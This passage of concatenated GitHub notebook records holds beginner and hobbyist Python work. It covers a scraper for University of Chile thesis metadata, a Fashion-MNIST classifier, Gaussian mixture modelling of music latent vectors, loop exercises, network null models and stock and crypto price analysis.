requests.get(i)\n soup_t = BeautifulSoup(resp_t.text, \"html.parser\")\n\n #Título\n try:\n titulo = soup_t.find(\"h2\").text\n except:\n titulo = \"\"\n\n #Autor\n try:\n autor = soup_t.find(itemprop = \"author\").text\n except:\n autor = \"\"\n\n #Grado\n try:\n g = soup_t.find(class_=\"simple-item-view-notadetesis\")\n if g != None:\n grado = g.find_all(\"div\")[1].text\n else:\n h = soup_t.find_all(class_=\"simple-item-view-description\")[1]\n if h != None:\n grado = h.find_all(\"div\")[1].text\n else:\n grado = \"\"\n except:\n grado = \"\"\n\n #Nombre del asesor(es)\n try:\n asesor = []\n a = soup_t.find_all(class_=\"simple-item-view-authors\", limit = 2)[1]\n for i in a.find_all(itemprop=\"author\"):\n asesor.append(i.text)\n asesor_f = \", \".join(asesor)\n except:\n asesor = []\n\n #Año\n try:\n año = str(soup_t.find(class_=\"simple-item-view-date\").find_all(text=True, recursive=False)[1])\n except:\n año = \"\"\n\n #Resumen\n try:\n b = soup_t.find(class_ = \"simple-item-view-description\")\n if b != None:\n if b.find(itemprop = \"description\") != None:\n resumen = str(b.find(itemprop = \"description\").find_all(text=True, recursive=False)[0])\n else:\n resumen = \"\"\n except:\n resumen = \"\"\n\n x = [\"Universidad de Chile\", titulo, autor, grado, asesor_f, año, resumen]\n with open(\"Tesis.csv\", \"a\") as csv_file:\n escritor = csv.writer(csv_file, delimiter=\",\")\n escritor.writerow(x)\n\n# + [markdown] id=\"ETG5vpWcApjh\"\n# ## Visualizando lo obtenido\n\n# + id=\"iTqNGolu6rHF\"\nimport pandas as pd\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} id=\"KJ6U7fD2Ig_7\" outputId=\"fb4aa295-0d4a-4e6d-aee5-9671115c1a75\"\npd = pd.read_csv(\"Tesis.csv\")\npd\n\n# + [markdown] id=\"2nLs3QqE--C4\"\n# ---\n\n# + [markdown] id=\"XfFiZunw-_eo\"\n# # ADICIONAL\n\n# + [markdown] id=\"qj75X_AbCI1a\"\n# ### Verificando que páginas no tienen una descripción.\n\n# + id=\"TGsy_2qT-9e-\"\nfor i in lista_tesis:\n resp_t = requests.get(i)\n soup_t = BeautifulSoup(resp_t.text, \"html.parser\")\n try:\n a = soup_t.find(class_ = \"simple-item-view-description\").find(itemprop = \"description\")\n if a != None:\n print(1)\n else:\n print(0)\n except:\n print(0)\n\n# + [markdown] id=\"332GavQ3C9Sv\"\n# ### Intentando obtener la descripción solo en español.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"ARAfTodv-9w4\" outputId=\"84400781-892c-4f26-b4eb-1042a1ef9265\"\nresp_t = requests.get(\"https://repositorio.uchile.cl/handle/2250/189462\")\n#resp_t = requests.get(\"https://repositorio.uchile.cl/handle/2250/189462\")\n\nsoup_t = BeautifulSoup(resp_t.text, \"html.parser\")\n\nb = soup_t.find(class_ = \"simple-item-view-description\")\n\nif b != None:\n if b.find(itemprop = \"description\") != None:\n resumen = str(b.find(itemprop = \"description\").find_all(text=True, recursive=False)[0])\n else:\n resumen = \"\"\nprint(resumen)\n\n# + [markdown] id=\"NgrB3-FaDa3N\"\n# ### Verificando la toma de grados para algunas tesis\n# Me doy cuenta que algunas páginas de las tesis, como la 44, no tienen la misma estructura que las demás. 
Así que procedemos a agregar esa consideración al código final.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"mVHmiBCRDWHe\" outputId=\"899ed20e-9972-4b8f-cf49-c753f45ce161\"\nresp_t = requests.get(\"https://repositorio.uchile.cl/handle/2250/148976\")\nsoup_t = BeautifulSoup(resp_t.text, \"html.parser\")\ng = soup_t.find(class_=\"simple-item-view-notadetesis\")\nh = soup_t.find_all(class_=\"simple-item-view-description\")[1]\nif g != None:\n grado = g.find_all(\"div\")[1].text\nelif h != None:\n grado = h.find_all(\"div\")[1].text\nprint(grado)\n","repo_name":"BMaikel/TF_LP2","sub_path":"RepoExtra_Universidad_de_Chile.ipynb","file_name":"RepoExtra_Universidad_de_Chile.ipynb","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"72700651944","text":"# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 476} id=\"fJq1aidq-epc\" outputId=\"53d4371e-9a3d-4a2b-c7ca-ed0c9f7f87bc\"\n# %matplotlib inline\n# %config InlineBackend.figure_format = 'retina'\n\n# !pip install helper\n# !wget -c https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/intro-to-pytorch/helper.py\n\n\nimport helper\nfrom torch import nn, optim\n#pra usar função de ativação, log softmax, relu\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, utils\nimport torch\n\n#inferencia e validação\n\ntransform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5), (0.5)),\n ])\n\ntrainset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download = True, train= True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset,batch_size = 64, shuffle = True)\n\ntestset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download = True, train=False,transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)\n\n#Definindo a arquitetura da rede \nclass Classifier(nn.Module):\n def __init__(self):\n super().__init__()\n #quatro transformações lineares diferentes \n #3 camadas ocultas e uma camada de saída\n #primeira camada oculta tem 256 unidades \n self.fc1 = nn.Linear(784,256)\n #segunda camada oculta tem 128 unidades \n self.fc2 = nn.Linear(256,128)\n #terceira camada oculta tem 64 unidades \n self.fc3 = nn.Linear(128, 64)\n #nossa camada de saída tem 10 unidades \n self.fc4 = nn.Linear(64, 10)\n\n def forward(self, x):\n #certificar que o tensor de entrada está achatado\n x = x.view(x.shape[0], -1)\n\n #ai não precisa achatar no loop de treinamento\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = F.log_softmax(self.fc4(x), dim = 1)\n\n return x\n\n\nmodel = Classifier()\ncriterion = nn.NLLLoss()\n#Adam optmizer, basicamente o mesmo que a descida gradiente estocástica, mas tem umas propriedades onde usa o momento que acelera o processo de ajuste real \n#ele também ajusta a taxa de aprendizado para cada um dos parametros individuais em seu modelo \noptimizer = torch.optim.Adam(model.parameters(), lr = 0.003)\n\nepocas = 5\nfor e in range(epocas):\n running_loss = 0\n for images, labels in trainloader:\n logps = model(images)\n loss = criterion(logps, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n else:\n print(f\"Training loss: {running_loss}\")\n\ndataiter = iter(testloader)\nimages, labels = dataiter.next()\nimg = images[1]\n\nps = torch.exp(model(img))\n\nhelper.view_classify(img, 
ps, version='Fashion')\n","repo_name":"lauraarakakii/first-deep-learning-neural-network--MNIST","sub_path":"Fashion_MNIST.ipynb","file_name":"Fashion_MNIST.ipynb","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"40959756561","text":"# +\nimport numpy as np\nimport itertools\n\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport matplotlib\n\nfrom sklearn import mixture\n\nfrom pathlib import Path\nimport torch\nimport h5py\nimport tqdm\nfrom IPython.display import Audio, display\n\nimport sys\nsys.path += ['../music-translation/src']\n\nimport utils\nimport wavenet_models\nfrom utils import save_audio\nfrom wavenet import WaveNet\nfrom wavenet_generator import WavenetGenerator\nfrom nv_wavenet_generator import NVWavenetGenerator\nfrom nv_wavenet_generator import Impl\n# -\n\nencoded = []\nfor directory in Path('encoded-musicnet/encoded').iterdir():\n for path in directory.iterdir():\n encoded += [torch.load(path)]\nencoded = torch.cat(encoded, dim=0)\nflattened = torch.flatten(encoded, 1)\nflattened = flattened.cpu().numpy()\nprint(flattened.shape)\n\n# +\n#choosing model\n\nlowest_bic = np.infty\nbic = []\nn_components_range = range(1, 10)\ncv_types = ['spherical', 'tied', 'diag', 'full']\nfor cv_type in cv_types:\n for n_components in n_components_range:\n # Fit a Gaussian mixture with EM\n gmm = mixture.GaussianMixture(n_components=n_components,\n covariance_type=cv_type, reg_covar = 1e-4)\n gmm.fit(flattened)\n bic.append(gmm.bic(flattened))\n if bic[-1] < lowest_bic:\n lowest_bic = bic[-1]\n best_gmm = gmm\n# -\n\nprint(best_gmm.get_params())\n\nsamples = []\nfor i in range(4):\n samples += [torch.from_numpy(best_gmm.sample()[0].reshape(1, 64, 200))]\n\n# +\ncheckpoint = Path('../music-translation/checkpoints/pretrained_musicnet/bestmodel')\ndecoders = [0, 1, 2, 3, 4, 5]\nbatch_size = 1\nrate = 16000\nsplit_size = 20\n\n\n\ndef disp(x, decoder_ix):\n wav = utils.inv_mu_law(x.cpu().numpy())\n print(f'Decoder: {decoder_ix}')\n print(f'X min: {x.min()}, max: {x.max()}')\n\n display(Audio(wav.squeeze(), rate=rate))\n \ndef extract_id(path):\n decoder_id = str(path)[:-4].split('_')[-1]\n return int(decoder_id)\n\n\n\nprint('Starting')\nmatplotlib.use('agg')\n\ncheckpoints = checkpoint.parent.glob(checkpoint.name + '_*.pth')\ncheckpoints = [c for c in checkpoints if extract_id(c) in decoders]\nassert len(checkpoints) >= 1, \"No checkpoints found.\"\n\nmodel_args = torch.load(checkpoint.parent / 'args.pth')[0]\n\ndecoders = []\ndecoder_ids = []\nfor checkpoint in checkpoints:\n decoder = WaveNet(model_args)\n decoder.load_state_dict(torch.load(checkpoint)['decoder_state'])\n decoder.eval()\n decoder = decoder.cuda()\n decoder = WavenetGenerator(decoder, batch_size, wav_freq=rate)\n \n decoders += [decoder]\n decoder_ids += [extract_id(checkpoint)]\n\n# +\n#decoding randomly generated vectors\n\nyy = {}\nwith torch.no_grad():\n zz = []\n for vector in samples:\n zz += [vector]\n zz = torch.cat(zz, dim=0).float().cuda()\n print(zz.shape)\n\n with utils.timeit(\"Generation timer\"):\n for i, decoder_id in enumerate(decoder_ids):\n if decoder_id != 3:\n continue\n yy[decoder_id] = []\n decoder = decoders[i]\n for zz_batch in torch.split(zz, batch_size):\n print(zz_batch.shape)\n splits = torch.split(zz_batch, split_size, -1)\n audio_data = []\n decoder.reset()\n for cond in tqdm.tqdm_notebook(splits):\n audio_data += [decoder.generate(cond).cpu()]\n 
audio_data = torch.cat(audio_data, -1)\n yy[decoder_id] += [audio_data]\n yy[decoder_id] = torch.cat(yy[decoder_id], dim=0)\n# -\n\nfor decoder_ix, decoder_result in yy.items():\n i=0\n for sample_result, sample in zip(decoder_result, samples):\n disp(sample_result, decoder_ix)\n wav = utils.inv_mu_law(sample_result.cpu().numpy())\n \n component = best_gmm.predict(sample.reshape(1,12800))[0]\n print(component)\n save_audio(wav.squeeze(), Path(\"results/gmm\" + str(component) + '-' + str(i) + \"_d\" + str(decoder_ix) + \".wav\"), rate)\n i+=1\n\ncomponents = {}\nfor directory in Path('encoded-musicnet/encoded').iterdir():\n components[directory.name.replace('_', ' ')] = [0, 0, 0, 0, 0, 0]\n for path in directory.iterdir():\n component = best_gmm.predict(torch.flatten(torch.load(path), 1).cpu().numpy())[0]\n components[directory.name.replace('_', ' ')][component] += 1\nprint(components)\n\n# +\nn_components_range = range(1, 7)\n\ncolor_iter = itertools.cycle(['navy', 'turquoise', 'cornflowerblue',\n 'darkorange', 'red', 'green'])\ndistributions = ['component 0', 'component 1', 'component 2', 'component 3', 'component 4', 'component 5']\nbars = []\nkeys = ['Bach Solo Cello', 'Bach Solo Piano', 'Beethoven Accompanied Violin', 'Beethoven Solo Piano', 'Beethoven String Quartet', 'Cambini Wind Quintet']\n\nplt.figure(figsize=(16, 12))\nspl = plt.subplot(2, 1, 1)\nfor i, (component, color) in enumerate(zip(distributions, color_iter)):\n xpos = np.array(n_components_range) + .1 * (i - 2)\n bars.append(plt.bar(xpos, [components[key][i] for key in keys],\n width=.1, color=color))\nplt.xticks(n_components_range, labels = keys)\nplt.title('Component classification per domain')\nspl.set_xlabel('Domains')\nspl.legend(distributions)\n# -\n\nmeans = torch.from_numpy(best_gmm.means_).reshape(-1, 64, 200)\nprint(means)\n\n# +\n#decoding means of gmm components\n\nyy = {}\nwith torch.no_grad():\n zz = means.float().cuda()\n\n with utils.timeit(\"Generation timer\"):\n for i, decoder_id in enumerate(decoder_ids):\n if decoder_id != 3:\n continue\n yy[decoder_id] = []\n decoder = decoders[i]\n for zz_batch in torch.split(zz, batch_size):\n print(zz_batch.shape)\n splits = torch.split(zz_batch, split_size, -1)\n audio_data = []\n decoder.reset()\n for cond in tqdm.tqdm_notebook(splits):\n audio_data += [decoder.generate(cond).cpu()]\n audio_data = torch.cat(audio_data, -1)\n yy[decoder_id] += [audio_data]\n yy[decoder_id] = torch.cat(yy[decoder_id], dim=0)\n# -\n\nfor decoder_ix, decoder_result in yy.items():\n for sample_result, mean in zip(decoder_result, means):\n disp(sample_result, decoder_ix)\n wav = utils.inv_mu_law(sample_result.cpu().numpy())\n \n component = best_gmm.predict(mean.reshape(1,12800))[0]\n print(component)\n save_audio(wav.squeeze(), Path(\"results/gmm-mean\" + str(component) + \"_d\" + str(decoder_ix) + \".wav\"), rate)\n\n\n","repo_name":"18praveenb/orchestrator","sub_path":"latent-vectors/GaussianMixture.ipynb","file_name":"GaussianMixture.ipynb","file_ext":"py","file_size_in_byte":6623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"2342606205","text":"# ## 1.Print the String \"Python\" 10 Times\n\ni=1\nwhile i<=10:\n print(\"Python\")\n i=i+1\n\n# ## 2.write a program to print the number from 1 to 10\n\ni=1\nwhile i<=10:\n print(i)\n i=i+1\n\n# ## 3.write a program to print the sum of first 10 numbers\n\ni=1\nsum=0\nwhile i<=10:\n sum=sum+i\n i=i+1\nprint(sum)\n\n# ## 4.write a program to print n numbers using 
user input\n\nn=int(input(\"Enter the number \"))\ni=1\nwhile i<=n:\n print(i)\n i+=1\n\n# ## 5.write a program to print the sum of n numbers using user input\n\nn=int(input(\"Enter the number \"))\ni=0\nsum=0\nwhile i<=n:\n sum=sum+i\n i=i+1\nprint(sum)\n\n# ## 6.write a program to print the table\n\nn=int(input(\"Enter the number \"))\nfor i in range(1,11):\n print(n,'*',i,'=',n*i)\n\n# ## 7.write a program to print the Factorial of a number\n\nn=int(input('Enter the number'))\nf=1\nwhile n>0:\n f=f*n\n n=n-1\nprint(f)\n\n# ## 8.write a program to print the even numbers from 2 to 100\n\ni=1\nwhile i<=100:\n if i%2==0:\n print(i)\n i+=1\n\n# ## 9.write a program to print the odd numbers from 1 to 100\n\ni=1\nwhile i<100:\n print(i)\n i+=2\n\n# ## 10.write a program to check whether a given number is palindrome or not\n\nn=int(input())\ntemp=n\nm=str(n)\nl=-1\nstr2=''\nwhile l>=-len(m):\n str2=str2+m[l]\n l=l-1\nstr2=int(str2)\nif str2==temp:\n print(\"Number is a palindrome\")\nelse:\n print(\"Number is not a palindrome\") \n\n# ## 11.write a program to print the factors of a number\n\nn=int(input('Enter a number to find the factors of a number: '))\nfor i in range(1,n+1):\n if n%i==0:\n print(i)\n\n# ## 12.write a program to reverse a number\n\nn=int(input())\ntemp=n\nm=str(n)\nl=-1\nstr2=''\nwhile l>=-len(m):\n str2=str2+m[l]\n l=l-1\nstr2=int(str2)\nprint(str2)\n\n# ## 13.write a program to print the sum of reverse of a number\n\nn=int(input())\ntemp=n\nrev=0\nwhile n!=0:\n digit=n%10\n rev=rev*10+digit\n n=n//10\nrev=str(rev)\nsum=0\nadd=0\nfor i in rev:\n sum=int(i)\n add+=sum\nprint(add)\n\n# ## 14.write a program to check the given number is prime or not\n\n# +\nn=int(input('Enter a number: '))\nif n>1:\n for i in range(2,int(n/2)+1):\n if n%i==0:\n print(\"The Entered number is not a prime number\")\n break\n else:\n print(\"The Entered number is a prime number\")\n\nelse:\n print(\"The Entered number is not a prime number\")\n# -\n\n# ## 15.write a program to print the prime numbers from 1 to 100\n\nfor j in range(1,101):\n count=0\n t=j//2\n for i in range(2,t+1):\n if j%i==0:\n count=count+1\n break\n if count==0 and j>1:\n print(j)\n\n# ## 16.write a program to find the factors of a number\n\nn=int(input(\"Enter the number to find the factors of a number: \"))\nfor i in range(1,n+1):\n if n%i==0:\n print(i)\n\n# ## 17.write a program to check whether a given number is prime or not\n\nn=int(input('Enter a number: '))\nif n>1:\n for i in range(2,n):\n if n%i==0:\n print(\"The Entered number is not a prime number\")\n break\n else:\n print(\"The Entered number is a prime number\")\nelse:\n if n==0 or n==1:\n print(\"The Entered number is not a prime number\")\n else:\n print(\"Please enter the positive number\")\n\n# ## 18.write a program to print prime numbers from 1 to 100\n\n#write a program to print prime numbers from 1 to 100\nfor i in range(1,101):\n if i>1:\n for j in range(2,i):\n if i%j==0:\n break\n else:\n print(i)\n\n# ## 19.write a program to print cube of all the numbers from 1 to given number\n\nn=int(input(\"Enter a number: \"))\nfor x in range(1,n+1):\n print(\"The cube of a number\",x,\"is\",x**3)\n\n# ## 20. 
write a program to count the total number of digits in a number\n\nn=int(input(\"Enter a number: \"))\ncount=0\nwhile n!=0:\n n//=10\n count+=1\nprint(\"The total number of digits are \",count)\n\n# ## 21.write a program to print the factorial of a number\n\n#Fibonacci series\nn=int(input('Enter the number: '))\nf=1\nwhile n>0:\n f=f*n\n n=n-1\nprint(f)\n\n# ## 22.write a program to print the fibonacci series\n\n#Fibonacci sequence\nt=int(input('Enter the number: '))\nn1,n2=0,1\ncount=0\nif t<=0:\n print(\"Please enter a positive value\")\nelif t==1:\n print(n2)\nelse:\n while count<=t:\n print(n1)\n n=n1+n2\n n1=n2\n n2=n\n count+=1\n\n# ## 23.write a program whether a given number is amstrong or not\n\nn=int(input(\"Enter the number: \"))\ncount=len(str(n))\nsum=0\ntemp=n\nwhile temp>0:\n digit=temp%10\n sum+=digit**count\n temp=temp//10\nif n==sum:\n print(\"The Entered number\",n,\"is an amstrong\")\nelse:\n print(\"The Entered number\",n,\"is not an amstrong\")\n\n# ## 24.write a program whether a given number is strong or not\n\nn=int(input(\"Enter a number: \"))\ntemp=n\ns=0\nwhile n>0:\n fact=1\n digit=n%10\n for i in range(1,digit+1):\n fact=fact*i\n s=s+fact\n n=n//10\nif temp==s:\n print(\"The Entered number\",temp,\"is a strong number\")\nelse:\n print(\"The Entered number\",temp,\"is not a strong number\")\n\n# ## 25. write a program whether a given number is perfect or not\n\nn=int(input(\"Enter a number: \"))\nsum = 0\nfor x in range(1, n):\n if n % x == 0:\n sum += x\nif sum == n:\n print(\"The Entered Number is Perfect Number\")\nelse:\n print(\"The Entered Number is not Perfect Number\")\n\n# ## 26.write a program to print the following number pattern using a loop\n\n'''\na) 1 b) 1 c) 54321 (cone) d) 12345 e) 54321\n 12 22 5432 1234 4321\n 123 333 543 123 321\n 1234 4444 54 12 21\n 12345 55555 5 1 1 \n''' \n\nfor i in range(1,7):\n for j in range(1,i):\n print(j,end=\"\")\n print()\n\nfor i in range(6):\n for j in range(i):\n if i==4 or i==5:\n print(i,end=\"\")\n else:\n print(i,end=\"\")\n print()\n\ni=5\nstr1=''\nwhile i>0:\n str1=str1+str(i)\n i=i-1\nint1 = int(str1)\nwhile int1!=0:\n print(int1)\n int1=int1//10\n\nstr1=''\nfor i in range(1,6):\n str1=str1+str(i)\nint1=int(str1)\nwhile int1!=0:\n print(int1)\n int1=int1//10\n\nj=5 \nwhile j>0:\n i=j\n while i>0:\n print(i,end=\"\")\n i=i-1\n print()\n j=j-1\n\n# ## 27.write a program to print the following number pattern using a loop\n\n'''\n \n a) * b) ***** c) ***** d) ***** e) *\n ** ***** **** **** **\n *** ***** *** *** *** \n **** ***** ** ** ****\n ***** ***** * * *****\n \n '''\n\nfor i in range(7):\n for j in range(1,i):\n print(\"*\",end=\"\")\n print()\n\nfor i in range(5):\n for i in range(5):\n print(\"*\",end=\"\")\n print()\n\ni=5\nj=0\nwhile 0 < i:\n while j < i:\n print(\"*\",end=\"\")\n j=j+1\n print()\n i=i-1\n j=0\n\ni=5\nj=0\nstr1=\"\"\nwhile 0 < i:\n while j < i:\n str1=str1+\"*\"\n j=j+1\n print(str1.rjust(5,\" \"))\n i=i-1\n j=0\n str1=\"\"\n\nstr1=\"\"\nfor i in range(0,6):\n for j in range(0,i):\n str1=str1+\"*\"\n print(str1.rjust(5,\" \"))\n str1=\"\"\n\n# ## 28.write a program to print the following number pattern using a loop\n\n'''\na) A b) A c) ABCDE \n AB BB ABCD \n ABC CCC ABC \n ABCD DDDD AB \n ABCDE EEEEE A \n'''\n\nstr1='ABCDE'\ni=0\nj=0\nwhile i1:\n for i in range(2,num):\n if num%i==0:\n print(\"The Entered number {} is not a prime number\".format(num))\n break\n else:\n print(\"The Entered number {} is a prime number\".format(num))\n \nn=int(input(\"Enter a number: 
\"))\nprime_checker(n)\n# -\n\n# ## 30. write a number to check whether a given number is perfect number or not\n\nn=int(input(\"Enter a number: \"))\nsum = 0\nfor x in range(1, n):\n if n % x == 0:\n sum += x\nif sum == n:\n print(\"The Entered Number is Perfect Number\")\nelse:\n print(\"The Entered Number is not Perfect Number\")\n\n\n# ## 31. write a function that checks whether a passed string is palindrome or not\n\n# +\ndef palindrome(s):\n temp=s\n str2=''\n for i in s:\n str2 = i+str2\n if str2==temp:\n print(\"The Entered string {} is a palindrome\".format(temp))\n else:\n print(\"The Entered string {} is not a palindrome\".format(temp))\n \nstr1=input(\"Enter a string: \")\npalindrome(str1)\n# -\n\n\n","repo_name":"Shankarraj11/Python-code","sub_path":"Loop/Looping Programs.ipynb","file_name":"Looping Programs.ipynb","file_ext":"py","file_size_in_byte":9159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"20747599752","text":"# +\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom matplotlib import cm\nfrom matplotlib.colors import LogNorm\n\n#from matplotlib import rc, rcParams\nimport copy\nimport os\n\nfrom scipy.integrate import odeint\nfrom HTC_utils import *\n\nimport networkx as nx\nimport igraph as ig\n\nfrom tqdm.auto import tqdm\nfrom numba import jit, prange\n\n# +\nrc = {\"font.family\" : \"DejaVu Serif\", \n \"mathtext.fontset\" : \"dejavuserif\",\n \"xtick.labelsize\": 18,\n \"ytick.labelsize\": 18,\n 'axes.labelsize': 26}\nplt.rcParams.update(rc)\n\n#plt.rcParams[\"font.serif\"] = [\"Times New Roman\"] + plt.rcParams[\"font.serif\"]\n\n# +\nAij = np.loadtxt('connectome.txt')\nW = normalize(Aij)\n\nr1 = 0.1\nr2 = 0.1\n\nTminus = r1 * r2 / (r1 + r2 + r1*r2)\nTplus = r2 / (2*r2 +1)\n\nxplus = Tplus\nyplus = Tplus / r2\n\nxminus = Tminus\nyminus = Tminus / r2\n\nprint(Tminus)\nprint(Tplus)\n# -\n\nplt.figure(figsize=(6,6))\nim = plt.imshow(Aij, norm=LogNorm(vmin=1e-6, vmax=1))\nplt.colorbar(im,fraction=0.046, pad=0.03)\nplt.axis('off')\nplt.show()\n\n# # Null model 1\n# Maslov-Sneppen algorithm: same degree sequence
\n# (*) better than configuration model -> no self-loops or multi-edges\n\n# +\nfolder = 'randomized/'\n\nfor filename in os.listdir(folder):\n if 'npy' in filename:\n if '_1' in filename:\n print(filename)\n Q = np.load(folder+filename)\n\n# +\nplt.figure(figsize=(12,6))\n\nplt.subplot(1,2,1)\nim = plt.imshow(Aij, norm=LogNorm(vmin=1e-6, vmax=1))\nplt.colorbar(im,fraction=0.046, pad=0.03)\nplt.axis('off')\n\nplt.subplot(1,2,2)\nim = plt.imshow(Q, norm=LogNorm(vmin=1e-6, vmax=1))\nplt.colorbar(im,fraction=0.046, pad=0.03)\nplt.axis('off')\n\nplt.show()\n# -\n\nlen(Aij.nonzero()[0]) / 1e4\n\n\n","repo_name":"gbarzon/HTC_oscillations","sub_path":"Null_models.ipynb","file_name":"Null_models.ipynb","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"28735433702","text":"# 주식 및 코인 가격 분석 연습\n# ===\n\nimport yfinance as yf\nimport pandas as pd\n\ndata = yf.download([\"AAPL\", \"TSLA\", \"AMZN\", \"CPNG\"], start=\"2018-03-31\")\ndata\n\ndata[\"Close\"][\"AAPL\"]\n\naapl = yf.Ticker(\"AAPL\")\n\naapl.dividends #티커 이후 배당\n\naapl.splits #티커 이후 주식 분할\n\naapl.recommendations #티커 이후 애널리스트 평가\n\naapl.info #티커 이후 정보\n\naapl.history(period=\"max\")\n\ncpng = yf.Ticker(\"CPNG\")\n\ncpng.info\n\ncpng.history(\"max\")\n\nresult = cpng.info\ntype(result)\n\npd.Series(result)\n\nimport pyupbit as upbit\n\nupbit.get_tickers(fiat=\"KRW\")\n\nupbit.get_current_price([\"KRW-BTC\", \"KRW-ETH\"])\n\nticker = \"KRW-BTC\"\ninterval = \"day\"\nto = \"2022-01-01 00:00\"\ncount = 100\na = upbit.get_ohlcv(ticker=ticker, interval=interval, to=to, count=1461)\n\nk = pd.DataFrame(a)\nk\n\n_open = k[\"open\"]\n_close = k[\"close\"]\n\nfrom matplotlib import pyplot as plt\n\nplt.plot(_open)\nplt.plot(_close)\nplt.show()\n\ndt = pd.DataFrame(data)\ndt.to_csv(\".\\stock.csv\")\n\nfrom modules import mod_sql # SQL 기본 설정 모듈\n\ndb = mod_sql.Database()\n\n# +\nselect_sql = \"\"\"\n SELECT * FROM stock_trimmed\n \"\"\"\n\nk = db.executeAll(select_sql)\ndf = pd.DataFrame(k)\ndf\n# -\n\nl = []\nfor i in df.columns :\n for j in range(3) :\n if f\"_[{j}]\" in i :\n i = i.replace(f\"_[{j}]\", \"\")\n l.append(i)\nl\n\ndf.columns = l\ndf\n\ndf.columns = df.columns + \"-\" + df.loc[0] + df.loc[1]\ndf\n\ndf.drop(index=[0,1], inplace=True)\ndf\n\ndf.reset_index(drop=True, inplace=True)\ndf\n\ndf.isnull()\n\ndf2 = df.apply(lambda x : x.replace(\"\", None))\ndf2\n\ndf2.to_csv(\".\\stock_trimed.csv\")\n\n# +\nselect_sql = \"\"\"\n SELECT * FROM stock_trimmed\n \"\"\"\n\nk = db.executeAll(select_sql)\ndf = pd.DataFrame(k)\ndf\n# -\n\ndf.drop([\"MyUnknownColumn\"], axis=1, inplace=True)\ndf\n\n\ndf.rename(columns={\"MyUnknownColumn-Date\":\"Date\"}, inplace=True)\ndf\n\ndrop_sql = \"\"\"\n ALTER TABLE stock_trimmed DROP MyUnknownColumn\n \"\"\"\ndb.execute(drop_sql)\n\ncol_rename_sql = \"\"\"\n ALTER TABLE stock_trimmed CHANGE `MyUnknownColumn-Date` Date DATETIME\n \"\"\"\ndb.execute(col_rename_sql)\n\n# +\nselect_sql = \"\"\"\n SELECT * FROM stock_trimmed\n \"\"\"\n\nk = db.executeAll(select_sql)\ndf = pd.DataFrame(k)\ndf\n# -\n\nfor i in df.columns :\n print(i)\n\ndf.iloc[:,1:] = df.iloc[:, 1:].apply(lambda x : round(x,3)) #숫자 인덱싱 iloc\ndf\n\n\ndf[\"Close-TSLA\"] - df[\"Open-TSLA\"]\n\n# +\ncol_l = []\ndef fluc():\n k = []\n \n for i in df.columns :\n for j in df.columns :\n if (i[-4:] == j[-4:]) and (i.startswith(\"Close\") and j.startswith(\"Open\")) :\n k.append(df[i] - df[j])\n col_l.append(f\"Fluc-{i[-4:]}\")\n return k\n\n\nfl = 
fluc()\nfl2 = pd.DataFrame(fl).T\nfl2.columns = col_l\n\n# -\n\nfl2\n\ncol_l\n\ndf2 = pd.concat([df, fl2], axis=1)\n\ndf2\n\n# +\ncol_l2 = []\ndef fluc_rate():\n k = []\n \n for i in col_l :\n for j in df.columns :\n if (i[-4:] == j[-4:]) and (j.startswith(\"Open\")) :\n k.append((df2[i] / df[j])*100)\n col_l2.append(f\"Fluc_Rate-{i[-4:]}\")\n return k\n\nfr = fluc_rate()\nfr2 = pd.DataFrame(fr).T\nfr2.columns = col_l2\nfr2\n# -\n\ndf3 = pd.concat([df2, fr2], axis=1) #concat함수는 [리스트]로 묶어서, axis -> 결합할 축 방향 설정.\ndf3\n\n# +\nname_list = [\"AAPL\", \"AMZN\", \"CPNG\", \"TSLA\"]\nplt.figure(figsize=(15,15)) #서브플롯 띄우기 전에 피겨 설정\nplt.tight_layout(pad=10, h_pad=10, w_pad=10, rect=(2,2,2,2)) #서브플롯 간 여백 설정\nfor i in range(1, 17) : \n if i < 5 :\n plt.subplot(4,4,i)\n plt.title(f\"Open-{name_list[i-1]}\")\n plt.plot(df3[f\"Open-{name_list[i-1]}\"], f\"C{i-1}\")\n elif 5<= i < 9 :\n plt.subplot(4,4,i)\n plt.title(f\"Close-{name_list[i-5]}\")\n plt.plot(df3[f\"Close-{name_list[i-5]}\"], f\"C{i-5}\")\n elif 9<= i < 13 :\n plt.subplot(4,4,i)\n plt.title(f\"Fluc-{name_list[i-9]}\")\n plt.plot(df3[f\"Fluc-{name_list[i-9]}\"], f\"C{i-9}\")\n elif 13<= i < 17 :\n plt.subplot(4,4,i)\n plt.title(f\"Fluc_Rate-{name_list[i-13]}\")\n plt.plot(df3[f\"Fluc_Rate-{name_list[i-13]}\"], f\"C{i-13}\")\n\nplt.show()\n","repo_name":"umchapter/what_I_have_learnt","sub_path":"Stock_etc_prac/20220321_stock_etc_prac.ipynb","file_name":"20220321_stock_etc_prac.ipynb","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"33672554695","text":"# + 